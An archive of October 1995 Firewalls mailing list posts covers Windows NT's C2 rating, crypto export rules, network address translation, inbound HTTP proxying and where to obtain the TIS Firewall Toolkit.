miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA26504 for ; Wed, 11 Oct 1995 05:12:52 -0700 Received: from faui01.informatik.uni-erlangen.de (root@faui01.informatik.uni-erlangen.de [131.188.2.1]) by uni-erlangen.de with ESMTP id NAA23347 (8.6.12/7.4f-FAU); for ; Wed, 11 Oct 1995 13:10:43 +0100 Received: from faui04e.informatik.uni-erlangen.de (tnsturm@faui04e.informatik.uni-erlangen.de [131.188.63.14]) by cip.informatik.uni-erlangen.de with ESMTP id NAA11297 (8.6.12/7.4f-FAU); for ; Wed, 11 Oct 1995 13:10:41 +0100 From: Torsten Sturm (CIP 89) Message-Id: <199510111210.NAA11297@faui01.informatik.uni-erlangen.de> Subject: Microsoft STT (Secure Transaction Technology) ? To: Firewalls@GreatCircle.COM Date: Wed, 11 Oct 1995 13:10:39 +0100 (MET) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 858 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Microsoft STT (Secure Transaction Technology) Private Communication Technology (PCT) What is your opinion about the following: http://www.microsoft.com/windows/pr/spt2795m.htm -- Time is a drug. Too much of it kills you (Terry Pratchett: Small Gods) __________________________________________________________________________ | | | Torsten Sturm: ComputerScience Student University of Erlangen-Nuremburg| | FTP-Administrator for PC / Windows subdirs of ftp.uni-erlangen.de | | | | EMail: tnsturm@cip.informatik.uni-erlangen.de | | WWW: http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html | |________________________________________________________________________| From firewalls-owner Wed Oct 11 05:43:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA27281 for firewalls-outgoing; Wed, 11 Oct 1995 05:41:45 -0700 Received: from E-MAIL.COM (tcpgate.advantis.com [199.171.26.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA27271 for ; Wed, 11 Oct 1995 05:41:41 -0700 Message-Id: <199510111241.FAA27271@miles.greatcircle.com> Received: from cem-bb.e-mail.com by E-MAIL.COM (IBM VM SMTP V2R2) with BSMTP id 3523; Wed, 11 Oct 95 08:39:46 EDT Date: Wed, 11 Oct 1995 08:42:59 EDT From: toon@cem-bb.e-mail.com To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark (gblolmxb@ibmmail.com) is wondering about the IBM Global Network. As far as I know they have an SNA (SNI) part that is separated from a more 'open' part (IP, IPX) by some internal security gateways. We ourselfs do make use of the SNA part and I feel comfortable with it. I would not feel so comfortable with the 'open' part, because IBM uses it as their way to be an Internet provider, so it seems not logic that some security is placed between the Internet and an IBM customer. So, yes it is private, no it is not secure. If you are connected to the SNA part without any IP connection, you still have some Internet functionalities available. There is the mail possibility that I'm using to send this message. It is not very userfriendly but it connects our mainframe users to the world. There is also an application called TCPgate where you log on to a IBM mainframe that acts as a gateway and let you do Telnet, FTP or Gopher. Although this works and I think it is very secure, I don't like it (to telnet a unix box with a 3270 screen makes me sick). Toon Mordijck From firewalls-owner Wed Oct 11 06:31:25 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA28381 for firewalls-outgoing; Wed, 11 Oct 1995 06:13:24 -0700 Received: from faui45.informatik.uni-erlangen.de (faui45.informatik.uni-erlangen.de [131.188.2.45]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA28238 for ; Wed, 11 Oct 1995 06:10:04 -0700 Received: from faui01.informatik.uni-erlangen.de (root@faui01.informatik.uni-erlangen.de [131.188.2.1]) by uni-erlangen.de with ESMTP id OAA00137 (8.6.12/7.4f-FAU); for ; Wed, 11 Oct 1995 14:08:04 +0100 Received: from faui04e.informatik.uni-erlangen.de (tnsturm@faui04e.informatik.uni-erlangen.de [131.188.63.14]) by cip.informatik.uni-erlangen.de with ESMTP id OAA12730 (8.6.12/7.4f-FAU); for ; Wed, 11 Oct 1995 14:08:03 +0100 From: Torsten Sturm (CIP 89) Message-Id: <199510111308.OAA12730@faui01.informatik.uni-erlangen.de> Subject: Re: Windows NT C2: Details here To: Firewalls@GreatCircle.COM Date: Wed, 11 Oct 1995 14:08:01 +0100 (MET) In-Reply-To: <01HWB61KZ9MQ0004P9@MAINZ.DK> from "Kim Wohlert" at Oct 11, 95 09:55:37 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 7306 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To supply the C2 Discussion with basic infos: DOCUMENT:Q93362 25-SEP-1995 [winnt] TITLE :C2 Evaluation and Certification for Windows NT PRODUCT :Microsoft Windows NT PROD/VER:3.10 3.50 OPER/SYS:WINDOWS KEYWORDS:kbother -------------------------------------------------------------------------- The information in this article applies to: - Microsoft Windows NT operating system version 3.1 - Microsoft Windows NT Advanced Server version 3.1 - Microsoft Windows NT Workstation version 3.5 - Microsoft Windows NT Server version 3.5 -------------------------------------------------------------------------- SUMMARY ======= C2 refers to a set of security policies that define how a secure system operates. The C2 evaluation process is separate from the C2 certification process. As of August, 1995, National Security Agency (NSA) granted the C2 security rating for Windows NT Server and Workstation version 3.5. As a result these operating systems are on the Evaluated Products List (EPL). NOTE: This does not mean that Windows NT is C2 certified (no operating system is ever C2 certified). Certification applies to a particular installation, including hardware, software, and the environment that the system is in. It is up to an individual site to become C2 certified. MORE INFORMATION ================ The requirements for A-, B-, C-, and D-level secure products are outlined in the Trusted Computer System Evaluation Criteria (TCSEC) published by the National Computer Security Center (NCSC). This publication is referred to as the "Orange Book," and is part of NSA's security "rainbow series." Security level requirements are open to interpretations that change over time. When undergoing evaluation, each vendor negotiates with the NSA about whether or not the details of its particular system implementation conform with the abstract security policy concepts in the NSA's books. The vendor must provide evidence that the requirements are being met. Microsoft has opted not to include certain components of NT in the evaluation process, not because they would not pass the evaluation, but to save time by reducing the load on the NSA. Additionally, the MS-DOS/Windows on Windows (WOW) system may be treated as a Win32 application and would therefore not need to be evaluated as part of the Trusted Computer Base (TCB). Networking on NT may not have to go through the "Red Book," or "Trusted Network Interpretation." It may be enough to consider networking to be another subsystem, and therefore only the Orange Book would apply. New or modified components and other hardware platforms can go through a "RAMP" process to be included in the evaluation at a later time. C2 Overview ----------- The security policy in C2 is known as Discretionary Access Control (DAC). In the Windows NT implementation, the basic idea is that users of the system: - Own objects - Have control over the protection of the objects they own - Are accountable for all their access-related actions C2 classification does not define a substantive security system in the sense of classified or unclassified data. (B-level security assumes the existence of an independent security classification system and enforces that system, but does not specify the substance of the classification system.) For example, in Windows NT, every object (file, Clipboard, window, and so on) has an owner; any owner can give or not give other users access to its objects. The system tracks (audits) your actions for the administrators (that is, the system administrator can track the objects you accessed, both successes and failures). The key distinction between C-level and B-level security is in the notion of access control. In a C2 (DAC) system, owners have absolute discretion about whether or not others have access to their objects. In a B-level, or Mandatory Access Control (MAC) system, objects have a security level defined independently from the owner's discretion. For example, if you receive a copy of an object marketed "secret," you can't give permission to other users to see this object unless they have "secret" clearance. This is defined by the system independent of your discretion. MAC involves the concept of "data labeling," which is the creation and maintenance by the system of security "labels" on data objects, unalterable by users (except in certain cases under system control and auditing). An administrator can get access to anyone's objects, although it may require some programming to do so (that is, the user interface won't expose this power). And another one : DOCUMENT:Q137018 20-SEP-1995 [winnt] TITLE :Availability of C2 Security Compliant Windows NT PRODUCT :Microsoft Windows NT PROD/VER:3.50 OPER/SYS:WINDOWS KEYWORDS:kbother ------------------------------------------------------------------------- The information in this article applies to: - Microsoft Windows NT Workstation versions 3.5 - Microsoft Windows NT Server versions 3.5 ------------------------------------------------------------------------- SUMMARY ======= As of August, 1995, Windows NT workstation and Windows NT Server version 3.5 with Service Pack 3 for Windows NT 3.5 installed achieved the C2 security rating from the U.S. National Security Agency (NSA). Windows NT Workstation and Windows NT Server are now the first mainstream, GUI operating systems to successfully complete this security evaluation. MORE INFORMATION ================ As of September, 1995, customers who require C2 secure versions of Windows NT Workstation or Server version 3.5 can begin placing orders directly with Microsoft Inside Sales at (800) 426-9400. Successful completion of the C2 security evaluation means that Windows NT Workstation and Server version 3.5 have now been added to the Evaluated Products List (EPL) published by the National Security Agency. Even though the C2 security class springs from the needs of US government installations, any organization concerned about security of business- sensitive data may have need of these security features. For additional information on the C2 Evaluation and Certification process, please see the following article in the Microsoft Knowledge Base: ARTICLE-ID: Q93362 TITLE : C2 Evaluation and Certification for Windows NT The National Security Agency requires that customers purchase the following components as the first step toward completion of a secure installation: 1. The Windows NT Workstation or Windows NT Server software. 2. Service Pack 3 for Windows NT version 3.5. 3. The Security Administrator's Guide (aka Trusted Facilities Manual) HTH Torsten -- Time is a drug. Too much of it kills you (Terry Pratchett: Small Gods) __________________________________________________________________________ | | | Torsten Sturm: ComputerScience Student University of Erlangen-Nuremburg| | FTP-Administrator for PC / Windows subdirs of ftp.uni-erlangen.de | | | | EMail: tnsturm@cip.informatik.uni-erlangen.de | | WWW: http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html | |________________________________________________________________________| From firewalls-owner Wed Oct 11 06:43:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA28905 for firewalls-outgoing; Wed, 11 Oct 1995 06:40:20 -0700 Received: from devel.dejong.com (devel.dejong.com [198.235.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA28898 for ; Wed, 11 Oct 1995 06:40:16 -0700 From: Chris Tyler To: Firewalls@GreatCircle.COM Date: Wed, 11 Oct 1995 09:38 EDT Subject: HTTP Proxy for Inbound Content-Length: 611 Content-Type: text/plain Message-ID: <307bc8d20.1b10@devel.dejong.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've never heard of proxying *inbound* http connections. The application is this: data from an http form needs to be passed to a midrange (AS/400 at a partner company). This could be done by having a CGI app receive the submitted form and talk to the AS/400 about it, or by passing the form directly to an httpd on the AS/400. Obviously, there is more control using the CGI app method, but what possibilities exist for passing the submission to the midrange? Chris Tyler Chris@DeJong.Com CTyler@Oxford.Net Systems Development Manager, Wm. De Jong Enterprises Inc. +1-519-424-9007 / fax +1-519-424-2399 From firewalls-owner Wed Oct 11 07:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA29149 for firewalls-outgoing; Wed, 11 Oct 1995 06:53:28 -0700 Received: from kgbvax.network.com ([129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA29134 for ; Wed, 11 Oct 1995 06:53:15 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA08689; Wed, 11 Oct 1995 08:47:10 -0400 Date: Wed, 11 Oct 1995 08:47:10 -0400 From: Ted Doty Message-Id: <199510111247.IAA08689@kgbvax.network.com> To: adam@bwh.harvard.edu, raberry2@ix.netcom.com (Ron Berry) Subject: Re: International Encryption Protocols (RC2) or (IDEA) In-Reply-To: Mail from 'Adam Shostack ' dated: Tue, 10 Oct 1995 16:26:23 -0400 (EDT) Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Adam Shostack writes: > If an encryption algorithim can be exported from the United > States, it is, by law, quite weak. I would urge that you look at > buying your encryption technology outside of the US for worldwide > delpoyment. IDEA is a relatively new cryptosystem, but it has been > subjected to a fair amount of scrutiny, and it seems to resist most > attacks well. Since most governments consider cryptography to be a sensitive technology, most of them regulate it in one form or another. Certainly the signatory countries to the CoCom treaty all enforce similar export controls to those enforced by the USA. Therefore, do not go looking to purchase cryptography in the UK for use outside the UK. There appear to be a number of Swiss vendors for products containing IDEA, however, and I don't think that Switzerland signed the CoCom treaty. Note: the treaty has expired, but the signatory countries seem to still be willing to follow it. Nobody really wants to see strong crypto widely deployed. As always, all I know is what I read in the Washington Post. ;-) -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Wed Oct 11 07:43:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA00558 for firewalls-outgoing; Wed, 11 Oct 1995 07:40:16 -0700 Received: from ncar.UCAR.EDU (ncar-e.ucar.edu [192.52.106.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA00551; Wed, 11 Oct 1995 07:40:11 -0700 Message-Id: <199510111438.IAA27529@ncar.ucar.EDU> Received: by ncar.ucar.EDU (NCAR-local/ NCAR Central Post Office 03/11/93) id IAA27529; Wed, 11 Oct 1995 08:38:12 -0600 Subject: Re: WE THE PEOPLE "....want the facts to make informed intel To: mah@ic.co.at (Michael Haberler) Date: Wed, 11 Oct 95 8:38:11 MDT Cc: Brent@GreatCircle.COM, firewalls@GreatCircle.COM, mcb@GreatCircle.COM In-Reply-To: ; from "Michael Haberler" at Oct 11, 95 4:39 am From: woods@ncar.ucar.edu (Greg Woods) X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > What about mailing list/news software which only would accept PGP-signed > messages where the keys must have a certificate path lenth of at least 2 in > the mailinglist web of trust (i.e. a contributor must be endorsed by at > least two other)? [...] > I think it could reduce the > random bozo factor by orders of magnitude. Probably so, but it also increases the hassle factor for the legitimate members of the list. The typical tradeoff between security and user convenience; the more secure something is, the more hassle it is for the legitimate users. I personally think this is way too much to require for your average mailing list just to eliminate spams. It will also eliminate a lot of potential contributors. However, this kind of thing probably has its uses for some specific cases, particularly where restricting who can contribute is considered a feature rather than a bug. --Greg From firewalls-owner Wed Oct 11 09:51:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02818 for firewalls-outgoing; Wed, 11 Oct 1995 09:39:04 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA02811 for ; Wed, 11 Oct 1995 09:39:00 -0700 Received: from dtw-17.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) for id MAA26046; Wed, 11 Oct 1995 12:41:25 -0700 Date: Wed, 11 Oct 1995 12:41:25 -0700 Message-Id: <199510111941.MAA26046@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: janken@rust.net (Kenneth J. Stephens) Subject: Firewall Marketing Survey (Sort of) V2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have received several requests for more information from the Computer Security Institute (CSI)INTERNET Security survey. CSI will grant a copyright waiver for this document. I will post it on my WWW Page as soon as the paperwork is signed. I will post the WWW Page address here when it is ready. My ISP is going to kill me for this little trick. To reach CSI by email use this address: prapalus@mfi.com Thanks for the bandwidth. Ken PS: I do not represent CSI in any way, shape or form. This Information is presented without any validation of its accuracy. Bring your own grain of salt. [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Wed Oct 11 10:45:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04143 for firewalls-outgoing; Wed, 11 Oct 1995 10:37:43 -0700 Received: from services ([168.166.0.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04134 for ; Wed, 11 Oct 1995 10:37:37 -0700 Received: from services by services (SMI-8.6/SMI-SVR4) id MAA26105; Wed, 11 Oct 1995 12:36:00 -0500 Date: Wed, 11 Oct 1995 12:35:58 -0500 (CDT) From: "Frank K. Senter" X-Sender: fsenter@services To: Andrew Foss cc: "Jon 'tex' Boone" , lasseh@microfront.se, Firewalls@GreatCircle.COM Subject: Re: Address Translators In-Reply-To: <199510101921.MAA08517@translation.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 10 Oct 1995, Andrew Foss wrote: [Whack] > Most people who choose to continue to use other peoples addresses, merely > add static routes to the publicly accessable systems they may need to get to > in the overlapped address space. You also need to be sure those numbers > don't occur internally. > For example 20.0.0.0 belongs to CSC, they have a web site at 20.1.10.127. > Don't use 20.1.10.127 and provide a static route to that network if you > really need to contact it! > > In fact, many of the Class A owners prefer to dedicate a Class C to their > public machines anyway! > Nonetheless, if you have the option 10.0.0.0 is a better choice! Then what's a NAT for? I can throw static routes at any application gateway in order to "hide" my internal structure. What does the one-to-one address mapping provide? I think I read you as saying we should re-number our internal hosts to get away from (stolen) addresses. I view the static route solution as an ongoing administrative burden--or more importantly, that solution makes for poor IS-customer relations! We have to wait for our internal customers to discover our problem, then it's a race to see how quickly we can fix that particular instance. I'm not blasting you for making the above statement; thankyou for clarifying exactly how your product works. Others have responded to my previous post with programming oriented solutions for determining "port of origin" and doing address translation accordingly. I'm sure, however, we will buy a commercial firewall. I'm not opposed to renumbering our hosts--just need good justification for the poor souls who will have to actually do the work. Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. Box 270 Jefferson City MO 65102 From firewalls-owner Wed Oct 11 11:34:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA04976 for firewalls-outgoing; Wed, 11 Oct 1995 11:22:16 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA04969 for ; Wed, 11 Oct 1995 11:22:12 -0700 Received: from asimov.bwh.harvard.edu (asimov.bwh.harvard.edu [134.174.81.55]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id OAA13177; Wed, 11 Oct 1995 14:20:13 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by asimov.bwh.harvard.edu (8.6.9) id OAA02744; Wed, 11 Oct 1995 14:20:37 -0400 Message-Id: <199510111820.OAA02744@asimov.bwh.harvard.edu> Subject: Re: International Encryption Protocols (RC2) or (IDEA) To: IJB@saicuk.co.uk (Johnson-Bryden Ian) Date: Wed, 11 Oct 1995 14:20:37 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <307B8386@smtpgty.saicuk.co.uk> from "Johnson-Bryden, Ian" at Oct 11, 95 09:17:00 am X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2508 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian J-B wrote: | There is a lot of misinformation circulating about encryption. | | The OECD is due to make an announcement of recomendations around May next | year which will apply to some 24 nations. The European Commission has | encryption high on its agenda. DGXIII is reviewing the matter in respect of | encryption across the member states and across international boundaries. An | announcement could be made this year. Unlike OECD recomendations, work by | the Commission will become a directive within the EU and that will supercede | national legislation in the member states, or, more accurately, require | member states to enact national legislation in support of the directive. While Ian is substantially correct about the actions of governments, there are two points that he does not address. The first is that governments are subject to lobbying, the second is that most companies probably do not plan to wait six months to hear Washington or Brussels dictate their information security plans; they have real needs today that they should be planning to meet. Governments are subject to lobbying. Most of the governments that make the laws that cover most of the internet are, to one extent or another, answerable to the people, and do try to seek professional advice before making decisions. AAs most of us are aware, building strong information infrastructure requires strong cryptography; its like using concrete for highways. Governments will need to make allowances for this for the Information Superhighway to be built. (Just today, another article on Internet insecurities was on the front page of the New York Times. This is no longer a small issue.) You have needs now; odds are good that those needs do not include Clipper. From the point of view of building a secure network, or offering secure services, Clipper and its relatives are a single point of failure outside of your control. The government employees who own the database don't answer to you. They are corruptable, and for a small price. Aldrich Ames cost three million dollars. Could you buy the Clipper database for less? How much could you steal if all data moving in the There is a large amount of fear, uncertainty, and doubt about cryptography's future. My advice is to build systems based on todays laws, and not on what the future may hold, if no one speaks up to oppose it. Clipper has died an ignoble death in the US, it is fair to assume its relatives will do the same in Europe. From firewalls-owner Wed Oct 11 11:43:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05189 for firewalls-outgoing; Wed, 11 Oct 1995 11:31:22 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05182 for ; Wed, 11 Oct 1995 11:31:17 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id NAA02443 for ; Wed, 11 Oct 1995 13:29:17 -0500 Received: from segfs001.rollingmdws.pamd.cig.mot.com (segfs001.rollingmdws.pamd.cig.mot.com [160.4.63.51]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id NAA28594 for ; Wed, 11 Oct 1995 13:29:17 -0500 Received: from segws002.rollingmdws.pamd.cig.mot.com by segfs001.rollingmdws.pamd.cig.mot.com with smtp (Smail3.1.28.1 #10) id m0t35u0-0011VsC; Wed, 11 Oct 95 13:29 CDT Received: by segws002.rollingmdws.pamd.cig.mot.com (Smail3.1.28.1 #10) id m0t35qn-000VWxC; Wed, 11 Oct 95 13:25 CDT From: rthomas@pamd.cig.mot.com (Robert Owen Thomas) Message-Id: <9510111325.ZM16011@pamd.cig.mot.com> Date: Wed, 11 Oct 1995 13:25:57 -0500 X-Face: '+o0q01K;YU[Po[u16e?snj8;Ph$olcxk+[`d9&@_u}|*>qi52AcH"6z36pohM2<-EvKgoH[/FTF`GG)Csl`+9(6V/3W/BC9Pu3l0\2y$wGP@bj!Yn~f=_#.x.dYzEWFDe_MLBUIK\n[nkM_sq}/OjBILuOP$:F1#;YjjN3?PG8CJTwD"p/zT~^V_MqO\e; Tue, 10 Oct 1995 07:01:23 -0700 From: bt@vnet.IBM.COM Message-Id: <199510101401.HAA16338@miles.greatcircle.com> Received: from ATLVMIC1.VNET.IBM.COM by vnet.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 0126; Tue, 10 Oct 95 09:59:19 EDT Date: Tue, 10 Oct 95 09:59:18 EDT To: firewalls@greatcircle.com Subject: 'IBM NAT box' Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Brian T. Tucker bt@vnet.ibm.com IBM Southern Area Open Systems Center 1600 Riveredge Parkway Atlanta GA 30328 Subject: 'IBM NAT box' Take it from me, the IBM Internet Connection (nee NetSP) Secure Network Gateway product (I always call it a firewall) DOES NOT do address translation. Address hiding, yes. The ability to use private addressing by shutting down all packets through the packet filter and just using the proxies and SOCKS gateway, yes. Address translation, no. I don't know of a box from IBM to do address translation - but I'd like to have one, so I'm searching to ensure that my info is correct. thank you, Brian 404-644-5231 (Tie 237)(Fax 644-5284) From firewalls-owner Wed Oct 11 12:41:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07675 for firewalls-outgoing; Wed, 11 Oct 1995 12:26:28 -0700 Received: from dax.sai.com (dax.sai.com [198.137.245.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07668 for ; Wed, 11 Oct 1995 12:26:25 -0700 Received: from dax.sai.com by dax.sai.com with smtp (Smail3.1.29.1 #3) id m0t36mD-003pNJC; Wed, 11 Oct 95 15:25 EDT Date: Wed, 11 Oct 1995 15:25:17 -0400 (EDT) From: Darryl Wagoner To: Robert Owen Thomas cc: Firewalls@GreatCircle.COM Subject: Re: TIS FWTK? In-Reply-To: <9510111325.ZM16011@pamd.cig.mot.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 11 Oct 1995, Robert Owen Thomas wrote: > does anyone know where i can obtain a copy of the TIS Firewall Toolkit? > as i understand it, this is freeware. i tried ftp.near.net, but they > have the TIS stuff under lock and key. This is a trick question right? ftp.tis.com:/pub/firewalls/toolkit -- Darryl Wagoner darryl@sai.com http://www.sai.com/ Office: 603.672.0736 Fax: 603-672-4846 Web Pages for hire. Check out NH & MA Movies http://www.sai.com/movies From firewalls-owner Wed Oct 11 12:43:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07985 for firewalls-outgoing; Wed, 11 Oct 1995 12:39:45 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07974 for ; Wed, 11 Oct 1995 12:39:33 -0700 Date: Wed, 11 Oct 95 15:35 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Oops! To: firewalls@GREATCIRCLE.COM Message-ID: <951011193534.990214@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Never mind that last posting about the errant "From:" header -- I see that it was a piece of plain-jane text embedded in a message with an earlier "From:" header. So much for using line editors and not peeking ten lines earlier. "Look 'ere ye leap." -- Heywood From firewalls-owner Wed Oct 11 13:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07880 for firewalls-outgoing; Wed, 11 Oct 1995 12:33:14 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07873 for ; Wed, 11 Oct 1995 12:33:08 -0700 Date: Wed, 11 Oct 95 15:27 EDT From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: B2 rated WIndows NT? To: firewalls@GREATCIRCLE.COM Message-ID: <951011192756.209813@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Funny how a message with a "From: Wilner" header contains comments written by one Mr. Greg King. I certainly didn't put the comments there. Does Microsoft typically edit people's transactions before they get posted to this forum, or did the Majordomo scripts somehow screw up? From firewalls-owner Wed Oct 11 13:13:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08727 for firewalls-outgoing; Wed, 11 Oct 1995 13:08:27 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA08712 for ; Wed, 11 Oct 1995 13:08:23 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id QAA00756; Wed, 11 Oct 1995 16:06:27 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id QAA00309; Wed, 11 Oct 1995 16:06:24 -0400 (EDT) Date: Wed, 11 Oct 1995 16:06:24 -0400 (EDT) Message-Id: <199510112006.QAA00309@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM, rthomas@pamd.cig.mot.com Subject: Re: TIS FWTK? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com wrote: >does anyone know where i can obtain a copy of the TIS Firewall Toolkit? >as i understand it, this is freeware. i tried ftp.near.net, but they >have the TIS stuff under lock and key. > >any other suggested ftp/web sites? ftp://ftp.tis.com/pub/firewalls/toolkit/ - Morrow From firewalls-owner Wed Oct 11 13:16:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA08698 for firewalls-outgoing; Wed, 11 Oct 1995 13:06:35 -0700 Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA08691 for ; Wed, 11 Oct 1995 13:06:31 -0700 From: cjolley@iac.net Received: from 199.6.47.253 by little-miami.iac.net with SMTP id QAA25785; Wed, 11 Oct 1995 16:04:34 -0400 Message-Id: <199510112004.QAA25785@little-miami.iac.net> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Date: Wed, 11 Oct 95 16:02:30 -0500 Subject: Re: TIS FWTK? To: rthomas@pamd.cig.mot.com (Robert Owen Thomas), Firewalls@GreatCircle.COM In-Reply-To: <9510111325.ZM16011@pamd.cig.mot.com> X-Mailer: SPRY Mail Version: 04.00.06.17 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You should try anonymous ftp to ftp.tis.com. The FWTK is copyright Trusted Information Systems however they will license the software at no cost. On Wed, 11 Oct 1995, rthomas@pamd.cig.mot.com (Robert Owen Thomas) wrote: >does anyone know where i can obtain a copy of the TIS Firewall Toolkit? >as i understand it, this is freeware. i tried ftp.near.net, but they >have the TIS stuff under lock and key. > >any other suggested ftp/web sites? > >thanx in advance. > >regards, >--robert >-- > >o robert owen thomas: unix 